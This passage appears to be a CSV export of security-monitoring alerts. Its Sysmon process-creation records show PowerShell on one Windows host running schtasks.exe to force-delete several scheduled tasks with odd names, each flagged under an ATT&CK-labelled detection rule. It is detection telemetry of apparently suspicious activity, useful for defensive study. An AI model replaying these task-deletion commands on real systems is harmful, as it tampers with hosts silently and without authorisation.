Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.853",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.536 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-00102fff1900} +ProcessId: 7752 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN WebServers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.538483600Z"",""eventRecordID"":""2251"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.536\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-00102fff1900}\r\nProcessId: 7752\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: 
Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.536"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-00102fff1900}"",""processId"":""7752"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WebServers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.837",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.514 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-0010a0fd1900} +ProcessId: 7676 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsScan /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.516223900Z"",""eventRecordID"":""2250"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.514\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-0010a0fd1900}\r\nProcessId: 7676\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" 
/Delete /TN DnsScan /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.514"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-0010a0fd1900}"",""processId"":""7676"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsScan /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 
2020 @ 14:18:05.821",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.491 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-001010fc1900} +ProcessId: 7604 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Ddrivers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.494061700Z"",""eventRecordID"":""2249"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.491\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-001010fc1900}\r\nProcessId: 7604\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.491"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-001010fc1900}"",""processId"":""7604"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Ddrivers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.806",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.469 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-001081fa1900} +ProcessId: 7548 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Bluetooths /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.471119600Z"",""eventRecordID"":""2248"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.469\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-001081fa1900}\r\nProcessId: 7548\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.469"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-001081fa1900}"",""processId"":""7548"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Bluetooths /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.790",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.445 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-0010edf81900} +ProcessId: 7472 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WwANsvc /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.449861400Z"",""eventRecordID"":""2247"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.445\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-0010edf81900}\r\nProcessId: 7472\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:49:37.445"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-0010edf81900}"",""processId"":""7472"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WwANsvc /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.759",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.424 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-00105ff71900} +ProcessId: 7392 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN MiscfostNsi /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: 
Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.426681500Z"",""eventRecordID"":""2246"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.424\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-00105ff71900}\r\nProcessId: 7392\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.424"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-00105ff71900}"",""processId"":""7392"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN MiscfostNsi /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 